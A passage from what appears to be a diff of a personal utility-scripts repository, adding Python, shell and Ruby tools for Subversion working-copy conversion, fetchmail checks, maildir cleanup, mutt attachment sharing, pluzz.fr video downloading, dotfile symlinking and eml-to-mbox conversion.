"of\nSubversion, and is likely to be subsequently discarded, and/or "
"have\nunexpected side-effects: %s\n\n"
"WC format conversion was cancelled, use the --force option to "
"override\nthe default behavior."
% (self.get_name(), ", ".join(lossy_fields)))
def get_name(self):
"Return the name of this entry."
return len(self.fields) > 0 and self.fields[0] or ""
def __str__(self):
"Return all fields from this entry as a multi-line string."
rep = ""
for i in range(0, len(self.fields)):
rep += "[%s] %s\n" % (Entries.entry_fields[i], self.fields[i])
return rep
class Format:
"""Represents a .svn/format file."""
def __init__(self, path):
self.path = path
def write_format(self, format_nbr, verbosity=0):
format_string = '%d\n'
if os.path.exists(self.path):
if verbosity >= 1:
print("%s will be updated." % self.path)
os.chmod(self.path,0600)
else:
if verbosity >= 1:
print("%s does not exist, creating it." % self.path)
format = open(self.path, "w")
format.write(format_string % format_nbr)
format.close()
os.chmod(self.path, 0400)
class LocalException(Exception):
"""Root of local exception class hierarchy."""
pass
class LossyConversionException(LocalException):
"Exception thrown when a lossy WC format conversion is requested."
def __init__(self, lossy_fields, str):
self.lossy_fields = lossy_fields
self.str = str
def __str__(self):
return self.str
class UnrecognizedWCFormatException(LocalException):
def __init__(self, format, path):
self.format = format
self.path = path
def __str__(self):
return ("Unrecognized WC format %d in '%s'; "
"only formats 8, 9, and 10 can be supported") % (self.format, self.path)
def main():
try:
opts, args = my_getopt(sys.argv[1:], "vh?",
["debug", "force", "skip-unknown-format",
"verbose", "help"])
except:
usage_and_exit("Unable to process arguments/options")
converter = WCFormatConverter()
# Process arguments.
if len(args) == 2:
converter.root_path = args[0]
svn_version = args[1]
else:
usage_and_exit()
# Process options.
debug = False
for opt, value in opts:
if opt in ("--help", "-h", "-?"):
usage_and_exit()
elif opt == "--force":
converter.force = True
elif opt == "--skip-unknown-format":
converter.error_on_unrecognized = False
elif opt in ("--verbose", "-v"):
converter.verbosity += 1
elif opt == "--debug":
debug = True
else:
usage_and_exit("Unknown option '%s'" % opt)
try:
new_format_nbr = LATEST_FORMATS[svn_version]
except KeyError:
usage_and_exit("Unsupported version number '%s'; "
"only 1.4, 1.5, and 1.6 can be supported" % svn_version)
try:
converter.change_wc_format(new_format_nbr)
except LocalException, e:
if debug:
raise
sys.stderr.write("%s\n" % e)
sys.stderr.flush()
sys.exit(1)
print("Converted WC at '%s' into format %d for Subversion %s" % \
(converter.root_path, new_format_nbr, svn_version))
if __name__ == "__main__":
main()

check_fetchmail Executable file
@@ -0,0 +1,14 @@
#!/bin/sh
LOGFILE=/shared/meutel/fetchmail.log
# check fetchmail running as daemon
if ! pgrep fetchmail > /dev/null; then
echo "fetchmail is not running"
fi
# check error in log
grep -3 error $LOGFILE
# clear log
echo > $LOGFILE

clean_flash_cookies.sh Executable file
@@ -0,0 +1,5 @@
#!/bin/sh
FLASH_COOKIES_PATH=$HOME/.macromedia/
rm -rf $FLASH_COOKIES_PATH

cleanup-maildir Executable file
@@ -0,0 +1,533 @@
#!/usr/bin/python -tt
#
# Copyright 2004-2006 Nathaniel W. Turner <nate@houseofnate.net>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
USAGE
cleanup-maildir [OPTION].. COMMAND FOLDERNAME..
DESCRIPTION
Cleans up old messages in FOLDERNAME; the exact action taken
depends on COMMAND. (See next section.)
Note that FOLDERNAME is a name such as 'Drafts', and the
corresponding maildir path is determined using the values of
maildir-root, folder-prefix, and folder-seperator.
COMMANDS
archive - move old messages to subfolders based on message date
trash - move old messages to the trash folder
delete - permanently delete old messages
OPTIONS
-h, --help
Show this help.
-q, --quiet
Suppress normal output.
-v, --verbose
Output extra information for testing.
-n, --trial-run
Do not actually touch any files; just say what would be done.
-a, --age=N
Only touch messages older than N days. Default is 14 days.
-k, --keep-flagged-threads
If any messages in a thread are flagged, do not touch them or
any other messages in that thread.
Note: the thread-detection mechanism is currently based purely on
a message's subject. The In-Reply-To header is not currently used.
-r, --keep-read
If any messages are flagged as READ, do not touch them.
-t, --trash-folder=F
Use F as trash folder when COMMAND is 'trash'.
Default is 'Trash'.
--archive-folder=F
Use F as the base for constructing archive folders. For example, if F is
'Archive', messages from 2004 might be put in the folder 'Archive.2004'.
-d, --archive-hierarchy-depth=N
Specify number of subfolders in archive hierarchy; 1 is just
the year, 2 is year/month (default), 3 is year/month/day.
--maildir-root=F
Specifies folder that contains mail folders.
Default is "$HOME/Maildir".
--folder-seperator=str
Folder hierarchy seperator. Default is '.'
--folder-prefix=str
Folder prefix. Default is '.'
NOTES
The following form is accepted for backwards compatibility, but is deprecated:
cleanup-maildir --mode=COMMAND [OPTION].. FOLDERNAME..
EXAMPLES
# Archive messages in 'Sent Items' folder over 30 days old
cleanup-maildir --age=30 archive 'Sent Items'
# Delete messages over 2 weeks old in 'Lists/debian-devel' folder,
# except messages that are part of a thread containing a flagged message.
cleanup-maildir --keep-flagged-threads trash 'Lists.debian-devel'
"""
__version__ = "0.3.0"
# $Id$
# $URL$
import mailbox
import os.path
import os
import rfc822
import string
import socket
import time
import logging
import sys
import getopt
def mkMaildir(path):
"""Make a Maildir structure rooted at 'path'"""
os.mkdir(path, 0700)
os.mkdir(os.path.join(path, 'tmp'), 0700)
os.mkdir(os.path.join(path, 'new'), 0700)
os.mkdir(os.path.join(path, 'cur'), 0700)
class MaildirWriter(object):
"""Deliver messages into a Maildir"""
path = None
counter = 0
def __init__(self, path=None):
"""Create a MaildirWriter that manages the Maildir at 'path'
Arguments:
path -- if specified, used as the default Maildir for this object
"""
if path != None:
if not os.path.isdir(path):
raise ValueError, 'Path does not exist: %s' % path
self.path = path
self.logger = logging.getLogger('MaildirWriter')
def deliver(self, msg, path=None):
"""Deliver a message to a Maildir
Arguments:
msg -- a message object
path -- the path of the Maildir; if None, uses default from __init__
"""
if path != None:
self.path = path
if self.path == None or not os.path.isdir(self.path):
raise ValueError, 'Path does not exist'
tryCount = 1
srcFile = msg.getFilePath();
(dstName, tmpFile, newFile, dstFile) = (None, None, None, None)
while 1:
try:
dstName = "%d.%d_%d.%s" % (int(time.time()), os.getpid(),
self.counter, socket.gethostname())
tmpFile = os.path.join(os.path.join(self.path, "tmp"), dstName)
newFile = os.path.join(os.path.join(self.path, "new"), dstName)
self.logger.debug("deliver: attempt copy %s to %s" %
(srcFile, tmpFile))
os.link(srcFile, tmpFile) # Copy into tmp
self.logger.debug("deliver: attempt link to %s" % newFile)
os.link(tmpFile, newFile) # Link into new
except OSError, (n, s):
self.logger.critical(
"deliver failed: %s (src=%s tmp=%s new=%s i=%d)" %
(s, srcFile, tmpFile, newFile, tryCount))
self.logger.info("sleeping")
time.sleep(2)
tryCount += 1
self.counter += 1
if tryCount > 10:
raise OSError("too many failed delivery attempts")
else:
break
# Successful delivery; increment deliver counter
self.counter += 1
# For the rest of this method we are acting as an MUA, not an MDA.
# Move message to cur and restore any flags
dstFile = os.path.join(os.path.join(self.path, "cur"), dstName)
if msg.getFlags() != None:
dstFile += ':' + msg.getFlags()
self.logger.debug("deliver: attempt link to %s" % dstFile)
os.link(newFile, dstFile)
os.unlink(newFile)
# Cleanup tmp file
os.unlink(tmpFile)
class MessageDateError(TypeError):
"""Indicate that the message date was invalid"""
pass
class MaildirMessage(rfc822.Message):
"""An email message
Has extra Maildir-specific attributes
"""
def getFilePath(self):
if sys.hexversion >= 0x020500F0:
return self.fp._file.name
else:
return self.fp.name
def isFlagged(self):
"""return true if the message is flagged as important"""
import re
fname = self.getFilePath()
if re.search(r':.*F', fname) != None:
return True
return False
def getFlags(self):
"""return the flag part of the message's filename"""
parts = self.getFilePath().split(':')
if len(parts) == 2:
return parts[1]
return None
def isNew(self):
"""return true if the message is marked as unread"""
# XXX should really be called isUnread
import re
fname = self.getFilePath()
if re.search(r':.*S', fname) != None:
return False
return True
def getSubject(self):
"""get the message's subject as a unicode string"""
import email.Header
s = self.getheader("Subject")
try:
return u"".join(map(lambda x: x[0].decode(x[1] or 'ASCII', 'replace'),
email.Header.decode_header(s)))
except(LookupError):
return s
def getSubjectHash(self):
"""get the message's subject in a "normalized" form
This currently means lowercasing and removing any reply or forward
indicators.
"""
import re
import string
s = self.getSubject()
if s == None:
return '(no subject)'
return re.sub(r'^(re|fwd?):\s*', '', string.strip(s.lower()))
def getDateSent(self):
"""Get the time of sending from the Date header
Returns a time object using time.mktime. Not very reliable, because
the Date header can be missing or spoofed (and often is, by spammers).
Throws a MessageDateError if the Date header is missing or invalid.
"""
dh = self.getheader('Date')
if dh == None:
return None
try:
return time.mktime(rfc822.parsedate(dh))
except ValueError:
raise MessageDateError("message has missing or bad Date")
except TypeError: # gets thrown by mktime if parsedate returns None
raise MessageDateError("message has missing or bad Date")
except OverflowError:
raise MessageDateError("message has missing or bad Date")
def getDateRecd(self):
"""Get the time the message was received"""
# XXX check that stat returns time in UTC, fix if not
return os.stat(self.getFilePath())[8]
def getDateSentOrRecd(self):
"""Get the time the message was sent, fall back on time received"""
try:
d = self.getDateSent()
if d != None:
return d
except MessageDateError:
pass
return self.getDateRecd()
def getAge(self):
"""Get the number of seconds since the message was received"""
msgTime = self.getDateRecd()
msgAge = time.mktime(time.gmtime()) - msgTime
return msgAge / (60*60*24)
class MaildirCleaner(object):
"""Clean a maildir by deleting or moving old messages"""
__trashWriter = None
__mdWriter = None
stats = {'total': 0, 'delete': 0, 'trash': 0, 'archive': 0}
keepSubjects = {}
archiveFolder = None
archiveHierDepth = 2
folderBase = None
folderPrefix = "."
folderSeperator = "."
keepFlaggedThreads = False
trashFolder = "Trash"
isTrialRun = False
keepRead = False
def __init__(self, folderBase=None):
"""Initialize the MaildirCleaner
Arguments:
folderBase -- the directory in which the folders are found
"""
self.folderBase = folderBase
self.__mdWriter = MaildirWriter()
self.logger = logging.getLogger('MaildirCleaner')
self.logger.setLevel(logging.DEBUG)
def __getTrashWriter(self):
if not self.__trashWriter:
path = os.path.join(self.folderBase, self.folderPrefix + self.trashFolder)
self.__trashWriter = MaildirWriter(path)
return self.__trashWriter
trashWriter = property(__getTrashWriter)
def scanSubjects(self, folderName):
"""Scans for flagged subjects"""
self.logger.info("Scanning for flagged subjects...")
if (folderName == 'INBOX'):
path = self.folderBase
else:
path = os.path.join(self.folderBase, self.folderPrefix + folderName)
maildir = mailbox.Maildir(path, MaildirMessage)
self.keepSubjects = {}
for i, msg in enumerate(maildir):
if msg.isFlagged():
self.keepSubjects[msg.getSubjectHash()] = 1
self.logger.debug("Flagged (%d): %s", i, msg.getSubjectHash())
self.logger.info("Done scanning.")
def clean(self, mode, folderName, minAge):
"""Trashes or archives messages older than minAge days
Arguments:
mode -- the cleaning mode. Valid modes are:
trash -- moves the messages to a trash folder
archive -- moves the messages to folders based on their date
delete -- deletes the messages
folderName -- the name of the folder on which to operate
This is a name like "Stuff", not a filename
minAge -- messages younger than minAge days are left alone
"""
if not mode in ('trash', 'archive', 'delete'):
raise ValueError
if (self.keepFlaggedThreads):
self.scanSubjects(folderName)
archiveFolder = self.archiveFolder
if (archiveFolder == None):
if (folderName == 'INBOX'):
archiveFolder = ""
else:
archiveFolder = folderName
if (folderName == 'INBOX'):
path = self.folderBase
else:
path = os.path.join(self.folderBase, self.folderPrefix + folderName)
maildir = mailbox.Maildir(path, MaildirMessage)
fakeMsg = ""
if self.isTrialRun:
fakeMsg = "(Not really) "
# Move old messages
for i, msg in enumerate(maildir):
if self.keepFlaggedThreads == True \
and msg.getSubjectHash() in self.keepSubjects:
self.log(logging.DEBUG, "Keeping #%d (topic flagged)" % i, msg)
else:
if (msg.getAge() >= minAge) and ((not self.keepRead) or (self.keepRead and msg.isNew())):
if mode == 'trash':
self.log(logging.INFO, "%sTrashing #%d (old)" %
(fakeMsg, i), msg)
if not self.isTrialRun:
self.trashWriter.deliver(msg)
os.unlink(msg.getFilePath())
elif mode == 'delete':
self.log(logging.INFO, "%sDeleting #%d (old)" %
(fakeMsg, i), msg)
if not self.isTrialRun:
os.unlink(msg.getFilePath())
else: # mode == 'archive'
# Determine subfolder path
mdate = time.gmtime(msg.getDateSentOrRecd())
datePart = str(mdate[0])
if self.archiveHierDepth > 1:
datePart += self.folderSeperator \
+ time.strftime("%m", mdate)
if self.archiveHierDepth > 2:
datePart += self.folderSeperator \
+ time.strftime("%d", mdate)
subFolder = archiveFolder + self.folderSeperator \
+ datePart
sfPath = os.path.join(self.folderBase,
self.folderPrefix + subFolder)
self.log(logging.INFO, "%sArchiving #%d to %s" %
(fakeMsg, i, subFolder), msg)
if not self.isTrialRun:
# Create the subfolder if needed
if not os.path.exists(sfPath):
mkMaildir(sfPath)
# Deliver
self.__mdWriter.deliver(msg, sfPath)
os.unlink(msg.getFilePath())
self.stats[mode] += 1
else:
self.log(logging.DEBUG, "Keeping #%d (fresh)" % i, msg)
self.stats['total'] += 1
def log(self, lvl, text, msgObj):
"""Log some text with the subject of a message"""
subj = msgObj.getSubject()
if subj == None:
subj = "(no subject)"
self.logger.log(lvl, text + ": " + subj)
# Defaults
minAge = 14
mode = None
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
logging.disable(logging.INFO - 1)
logger = logging.getLogger('cleanup-maildir')
cleaner = MaildirCleaner()
# Read command-line arguments
try:
opts, args = getopt.getopt(sys.argv[1:],
"hqvnrm:t:a:kd:",
["help", "quiet", "verbose", "version", "mode=", "trash-folder=",
"age=", "keep-flagged-threads", "keep-read", "folder-seperator=",
"folder-prefix=", "maildir-root=", "archive-folder=",
"archive-hierarchy-depth=", "trial-run"])
except getopt.GetoptError, (msg, opt):
logger.error("%s\n\n%s" % (msg, __doc__))
sys.exit(2)
output = None
for o, a in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit()
if o in ("-q", "--quiet"):
logging.disable(logging.WARNING - 1)
if o in ("-v", "--verbose"):
logging.disable(logging.DEBUG - 1)
if o == "--version":
print __version__
sys.exit()
if o in ("-n", "--trial-run"):
cleaner.isTrialRun = True
if o in ("-m", "--mode"):
logger.warning("the --mode flag is deprecated (see --help)")
if a in ('trash', 'archive', 'delete'):
mode = a
else:
logger.error("%s is not a valid command" % a)
sys.exit(2)
if o in ("-t", "--trash-folder"):
cleaner.trashFolder = a
if o == "--archive-folder":
cleaner.archiveFolder = a
if o in ("-a", "--age"):
minAge = int(a)
if o in ("-k", "--keep-flagged-threads"):
cleaner.keepFlaggedThreads = True
if o in ("-r", "--keep-read"):
cleaner.keepRead = True
if o == "--folder-seperator":
cleaner.folderSeperator = a
if o == "--folder-prefix":
cleaner.folderPrefix = a
if o == "--maildir-root":
cleaner.folderBase = a
if o in ("-d", "--archive-hierarchy-depth"):
archiveHierDepth = int(a)
if archiveHierDepth < 1 or archiveHierDepth > 3:
sys.stderr.write("Error: archive hierarchy depth must be 1, " +
"2, or 3.\n")
sys.exit(2)
cleaner.archiveHierDepth = archiveHierDepth
if not cleaner.folderBase:
cleaner.folderBase = os.path.join(os.environ["HOME"], "Maildir")
if mode == None:
if len(args) < 1:
logger.error("No command specified")
sys.stderr.write(__doc__)
sys.exit(2)
mode = args.pop(0)
if not mode in ('trash', 'archive', 'delete'):
logger.error("%s is not a valid command" % mode)
sys.exit(2)
if len(args) == 0:
logger.error("No folder(s) specified")
sys.stderr.write(__doc__)
sys.exit(2)
logger.debug("Mode is " + mode)
# Clean each folder
for dir in args:
logger.debug("Cleaning up %s..." % dir)
cleaner.clean(mode, dir, minAge)
logger.info('Total messages: %5d' % cleaner.stats['total'])
logger.info('Affected messages: %5d' % cleaner.stats[mode])
logger.info('Untouched messages: %5d' %
(cleaner.stats['total'] - cleaner.stats[mode]))

copy-to-dir.sh Executable file
@@ -0,0 +1,96 @@
#!/bin/sh
#
# Copyright (c) 2010 Mary Gardiner
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
## INFO
# This is a very simple script designed to be used when using the email client
# mutt remotely. It copies attachments to a web accessible folder and tells you
# where to view them.
#
# More details are available at http://puzzling.org/logs/thoughts/2010/May/6/mutt-attachments
# if you want to override OUTPUTDIR and VIEWINGDIR edit them here or create a
# ~/.copy-to-dir file that looks like:
# OUTPUTDIR=someotherdir
# VIEWINGDIR=someother URI
# You can also optionally specify a location to rsync attachments to,
# RSYNCOUTPUTDIR=host:dir
# You'll probably want a passphraseless key for this and NO DELETION of rsynced
# attachments will take place.
### Extension
# use short generated file name
OUTPUTDIR=$HOME/public_html/attachments
VIEWINGDIR=https://ssl.meutel.net/~meutel/attachments
CONFIGFILE=$HOME/.copy-to-dir
if [ -e "$CONFIGFILE" ]
then
. "$CONFIGFILE"
fi
if [ -n "$1" ]
then
if [ -n "$RSYNCOUTPUTDIR" ]
then
SHORTNAME=`basename "$1"`
echo "Uploading attachment $SHORTNAME for viewing"
rsync --chmod=ugo+r --progress -ptve "ssh -C" "$1" "$RSYNCOUTPUTDIR"
echo
echo "View attachment $SHORTNAME at $VIEWINGDIR/$SHORTNAME"
elif [ ! -d "$OUTPUTDIR" ]
then
echo "ERROR: '$OUTPUTDIR' doesn't exist, or is not a directory"
else
SHORTNAME=`md5sum "$1" | cut -c -4`
DELETE="$OUTPUTDIR/$SHORTNAME"
cp "$1" "$DELETE"
chmod 644 "$DELETE"
# add the MIME type to the extended attributes
MIME_TYPE=`file -b --mime-type "$DELETE"`
attr -s Content-Type -V "$MIME_TYPE" "$DELETE"
echo "View attachment $SHORTNAME at $VIEWINGDIR/$SHORTNAME"
fi
fi
# From http://www.unix.com/unix-dummies-questions-answers/5961-wait-input.html
if [ -n "RSYNCOUTPUTDIR" ]
then
echo "Press any key to continue\c"
elif [ -n "$DELETE" ]
then
echo "Press any key to continue, and delete viewable attachment\c"
else
echo "No attachment specified, press any key to continue\c"
fi
oldstty=$(stty -g)
stty -icanon -echo min 1 time 0
dd bs=1 count=1 2>/dev/null
stty "$oldstty"
if [ -n "$DELETE" ]
then
rm "$DELETE"
fi

dl_pluzz Executable file
@@ -0,0 +1,57 @@
#!/bin/bash
# Script to use pluzz.fr
# v0.2 (11 July 2010)
if [ $# != 2 ]
then
printf "Syntaxe: $0 [url|play|record] http://www.pluzz.fr/...\n" >&2
exit 1
fi
command="$1"
url="$2"
if [ "$command" != 'url' -a "$command" != 'play' -a "$command" != 'record' ]
then
printf "Command must be 'url', 'play' or 'record', not '$command'\n" >&2
exit 2
fi
video_page_url=$(wget -qO- "$url" | grep -o 'http://info.francetelevisions.fr/?id-video=[^"]\+')
stream_url_part2=$(wget -qO- "$video_page_url" | grep urls-url-video | sed 's/.*content="\(.*\)".*/\1/')
ext=${stream_url_part2##*.}
if [ "$ext" = 'wmv' ]
then
stream_url_part1='mms://a988.v101995.c10199.e.vm.akamaistream.net/7/988/10199/3f97c7e6/ftvigrp.download.akamai.com/10199/cappuccino/production/publication'
elif [ "$ext" = 'mp4' ]
then
stream_url_part1='rtmp://videozones-rtmp.francetv.fr/ondemand/mp4:cappuccino/publication'
else
printf "Extension not managed : '$ext'\n" >&2
exit 3
fi
stream_url="$stream_url_part1/$stream_url_part2"
if [ "$command" = "url" ]
then
printf "$stream_url\n"
elif [ "$command" = "play" ]
then
if [ "$ext" = 'wmv' ]
then
vlc "$stream_url"
else
flvstreamer -r "$stream_url" | vlc -
fi
elif [ "$command" = "record" ]
then
output_file=${stream_url##*/}
printf "Recording to $output_file...\n"
if [ "$ext" = 'wmv' ]
then
vlc "$stream_url" ":sout=#std{access=file,mux=asf,dst=$output_file}"
else
flvstreamer -r "$stream_url" -o "$output_file"
fi
fi

dotfile-manager Executable file
@@ -0,0 +1,204 @@
#!/usr/bin/env python2
"""dotfilemanager.py - a dotfiles manager script. See --help for usage
and command-line arguments.
"""
import os,sys,platform
# TODO: allow setting hostname as a command-line argument also?
try:
HOSTNAME = os.environ['DOTFILEMANAGER_HOSTNAME']
except KeyError:
HOSTNAME = platform.node()
HOSTNAME_SEPARATOR = '__'
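# e.g. with HOSTNAME_SEPARATOR '__', a file named '_muttrc__dulip' is only
# linked (as ~/.muttrc) on the host 'dulip'; plain '_muttrc' is used on
# every other host.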
def tidy(d,report=False):
"""Find and delete any broken symlinks in directory d.
Arguments:
d -- The directory to consider (absolute path)
Keyword arguments:
report -- If report is True just report on what broken symlinks are
found, don't attempt to delete them (default: False)
"""
for f in os.listdir(d):
path = os.path.join(d,f)
if os.path.islink(path):
target_path = os.readlink(path)
target_path = os.path.abspath(os.path.expanduser(target_path))
if not os.path.exists(target_path):
# This is a broken symlink.
if report:
print 'tidy would delete broken symlink: %s->%s' % (path,target_path)
else:
print 'Deleting broken symlink: %s->%s' % (path,target_path)
os.remove(path)
def get_target_paths(to_dir,report=False):
"""Return the list of absolute paths to link to for a given to_dir.
This handles skipping various types of filename in to_dir and
resolving host-specific filenames.
"""
paths = []
filenames = os.listdir(to_dir)
for filename in filenames:
path = os.path.join(to_dir,filename)
if filename.endswith('~'):
if report:
print 'Skipping %s' % filename
continue
elif (not os.path.isfile(path)) and (not os.path.isdir(path)):
if report:
print 'Skipping %s (not a file or directory)' % filename
continue
elif filename.startswith('.'):
if report:
print 'Skipping %s (filename has a leading dot)' % filename
continue
else:
if HOSTNAME_SEPARATOR in filename:
# This appears to be a filename with a trailing
# hostname, e.g. _muttrc__dulip. If the trailing
# hostname matches the hostname of this host then we
# link to it.
hostname = filename.split(HOSTNAME_SEPARATOR)[-1]
if hostname == HOSTNAME:
paths.append(path)
else:
if report:
print 'Skipping %s (different hostname)' % filename
continue
else:
# This appears to be a filename without a trailing
# hostname.
if filename + HOSTNAME_SEPARATOR + HOSTNAME in filenames:
if report:
print 'Skipping %s (there is a host-specific version of this file for this host)' % filename
continue
else:
paths.append(path)
return paths
def link(from_dir,to_dir,report=False):
"""Make symlinks in from_dir to each file and directory in to_dir.
This handles converting leading underscores in to_dir to leading
dots in from_dir.
Arguments:
from_dir -- The directory in which symlinks will be created (string,
absolute path)
to_dir -- The directory containing the files and directories that
will be linked to (string, absolute path)
Keyword arguments:
report -- If report is True then only report on the status of
symlinks in from_dir, don't actually create any new
symlinks (default: False)
"""
# The paths in to_dir that we will be symlinking to.
to_paths = get_target_paths(to_dir,report)
# Dictionary of symlinks we will be creating, from_path->to_path
symlinks = {}
for to_path in to_paths:
to_directory, to_filename = os.path.split(to_path)
# Change leading underscores to leading dots.
if to_filename.startswith('_'):
from_filename = '.' + to_filename[1:]
else:
from_filename = to_filename
# Remove hostname specifiers.
parts = from_filename.split(HOSTNAME_SEPARATOR)
assert len(parts) == 1 or len(parts) == 2
from_filename = parts[0]
from_path = os.path.join(from_dir,from_filename)
symlinks[from_path] = to_path
# Attempt to create the symlinks that don't already exist.
for from_path,to_path in symlinks.items():
# Check that nothing already exists at from_path.
if os.path.islink(from_path):
# A link already exists.
existing_to_path = os.readlink(from_path)
existing_to_path = os.path.abspath(os.path.expanduser(existing_to_path))
if existing_to_path == to_path:
# It's already a link to the intended target. All is
# well.
continue
else:
# It's a link to somewhere else.
print from_path+" => is already symlinked to "+existing_to_path
elif os.path.isfile(from_path):
print "There's a file in the way at "+from_path
elif os.path.isdir(from_path):
print "There's a directory in the way at "+from_path
elif os.path.ismount(from_path):
print "There's a mount point in the way at "+from_path
else:
# The path is clear, make the symlink.
if report:
print 'link would make symlink: %s->%s' % (from_path,to_path)
else:
print 'Making symlink %s->%s' % (from_path,to_path)
os.symlink(to_path,from_path)
def usage():
return """Usage:
dotfilemanager link|tidy|report [FROM_DIR [TO_DIR]]
Commands:
link -- make symlinks in FROM_DIR to files and directories in TO_DIR
tidy -- remove broken symlinks from FROM_DIR
report -- report on symlinks in FROM_DIR and files and directories in TO_DIR
FROM_DIR defaults to ~ and TO_DIR defaults to ~/.dotfiles.
"""
if __name__ == "__main__":
try:
ACTION = sys.argv[1]
except IndexError:
print usage()
sys.exit(2)
try:
FROM_DIR = sys.argv[2]
except IndexError:
FROM_DIR = '~'
FROM_DIR = os.path.abspath(os.path.expanduser(FROM_DIR))
if not os.path.isdir(FROM_DIR):
print "FROM_DIR %s is not a directory!" % FROM_DIR
print usage()
sys.exit(2)
if ACTION == 'tidy':
tidy(FROM_DIR)
else:
try:
TO_DIR = sys.argv[3]
except IndexError:
TO_DIR = os.path.join('~','.dotfiles')
TO_DIR = os.path.abspath(os.path.expanduser(TO_DIR))
if not os.path.isdir(TO_DIR):
print "TO_DIR %s is not a directory!" % TO_DIR
print usage()
sys.exit(2)
if ACTION == 'link':
link(FROM_DIR,TO_DIR)
elif ACTION == 'report':
link(FROM_DIR,TO_DIR,report=True)
tidy(FROM_DIR,report=True)
else:
print usage()
sys.exit(2)

eml2mbox.rb Executable file

@@ -0,0 +1,265 @@
#!/usr/bin/ruby
#============================================================================================#
# eml2mbox.rb v0.08 #
# Last updated: Jan 23, 2004 #
# #
# Converts a bunch of eml files into one mbox file. #
# #
# Usage: [ruby] eml2mbox.rb [-c] [-l] [-s] [-yz] [emlpath [trgtmbx]] #
# Switches: #
# -c Remove CRs (^M) appearing at end of lines (Unix) #
# -l Remove LFs appearing at beginning of lines (old Mac) - not tested #
# -s Don't use standard mbox postmark formatting (for From_ line) #
# This will force the use of original From and Date found in mail headers. #
# Not recommended, unless you really have problems importing emls. #
# -yz Use this to force the order of the year and timezone in date in the From_ #
# line from the default [year][timezone] to [timezone][year]. #
# emlpath - Path of dir with eml files. Defaults to the current dir if not specified #
# trgtmbx - Name of the target mbox file. Defaults to "archive.mbox" in 'emlpath' #
# #
# Ruby homepage: http://www.ruby-lang.org/en/ #
# Unix mailbox format: http://www.broobles.com/eml2mbox/mbox.html #
# This script : http://www.broobles.com/eml2mbox #
# #
#============================================================================================#
# Licence: #
# #
# This script is free software; you can redistribute it and/or modify it under the terms of #
# the GNU Lesser General Public License as published by the Free Software Foundation; #
# either version 2.1 of the License, or (at your option) any later version. #
# #
# You should have received a copy of the GNU Lesser General Public License along with this #
# script; if not, please visit http://www.gnu.org/copyleft/gpl.html for more information. #
#============================================================================================#
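# Example (illustrative): convert the emls in ~/mail/emls into one mbox file:
#   ruby eml2mbox.rb -c ~/mail/emls ~/mail/archive.mbox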
require "parsedate"
include ParseDate
#=======================================================#
# Class that encapsulates the processing file in memory #
#=======================================================#
class FileInMemory
ZoneOffset = {
# Standard zones by RFC 2822
'UTC' => '0000',
'UT' => '0000', 'GMT' => '0000',
'EST' => '-0500', 'EDT' => '-0400',
'CST' => '-0600', 'CDT' => '-0500',
'MST' => '-0700', 'MDT' => '-0600',
'PST' => '-0800', 'PDT' => '-0700',
}
def initialize()
@lines = Array.new
@counter = 1 # keep the 0 position for the From_ line
@from = nil # from part of the From_ line
@date = nil # date part of the From_ line
end
def addLine(line)
# If the line is a 'false' From line, add a '>' to its beginning
line = line.sub(/From/, '>From') if line =~ /^From/ and @from!=nil
# If the line is the first valid From line, save it (without the line break)
if line =~ /^From:\s.*@/ and @from==nil
@from = line.sub(/From:/,'From')
@from = @from.chop # Remove line break(s)
@from = standardizeFrom(@from) unless $switches["noStandardFromLine"]
end
# Get the date
if $switches["noStandardFromLine"]
# Don't parse the content of the Date header
@date = line.sub(/Date:\s/,'') if line =~ /^Date:\s/ and @date==nil
else
if line =~ /^Date:\s/ and @date==nil
# Parse content of the Date header and convert to the mbox standard for the From_ line
@date = line.sub(/Date:\s/,'')
year, month, day, hour, minute, second, timezone, wday = parsedate(@date)
# Need to convert the timezone from a string to a 4 digit offset
unless timezone =~ /[+|-]\d*/
timezone=ZoneOffset[timezone]
end
time = Time.gm(year,month,day,hour,minute,second)
@date = formMboxDate(time,timezone)
end
end
# Now add the line to the array
line = fixLineEndings(line)
@lines[@counter]=line
@counter+=1
end
# Forms the first line (from + date) and returns all the lines
# Returns all the lines in the file
def getProcessedLines()
if @from != nil
# Add from and date to the first line
if @date==nil
puts "WARN: Failed to extract date. Will use current time in the From_ line"
@date=formMboxDate(Time.now,nil)
end
@lines[0] = @from + " " + @date
@lines[0] = fixLineEndings(@lines[0])
@lines[@counter] = ""
return @lines
end
# else don't return anything
end
# Fixes CR/LFs
def fixLineEndings(line)
